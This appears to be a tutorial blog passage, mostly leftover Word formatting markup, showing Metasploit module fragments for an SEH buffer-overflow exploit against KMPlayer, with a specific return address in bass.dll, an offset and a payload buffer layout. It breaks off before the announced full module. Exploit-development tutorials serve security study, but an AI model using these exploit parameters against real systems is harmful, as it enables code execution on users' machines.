<!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> <br />
<div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">Metasploit 'include' section :</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">-----------------------------</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">#Don't forget to include the SEH mixin !</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">include Msf::Exploit::Seh</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">Metasploit 'Targets' section :</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">------------------------------</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">'Targets'<span style="mso-tab-count: 2;"> </span>=></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">[</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">[ '<fill in the OS/app version here>',</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">{</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">'Ret'<span style="mso-spacerun: yes;"> </span><span style="mso-tab-count: 1;"> </span>=><span style="mso-tab-count: 1;"> </span>0x1101dd36,</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">'Offset'<span style="mso-tab-count: 1;"> </span>=><span style="mso-tab-count: 1;"> </span>3314</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">}</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">], # pop esi # pop ebx # ret 10 - bass.dll</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">],</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">Metasploit 'exploit' section :</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">-----------------------------</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">def exploit</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">buffer = rand_text(target['Offset'])<span style="mso-tab-count: 1;"> </span>#junk</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">buffer << generate_seh_record(target.ret)</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">buffer << make_nops(30)</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">buffer << payload.encoded<span style="mso-tab-count: 1;"> </span>#1652 bytes of space</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">end</span></div><div class="MsoNormal"><br />
</div><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;">Based on above suggession, I have crafted following metasploit module for KMPlayer SEH exploiations.</span><br />
<!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
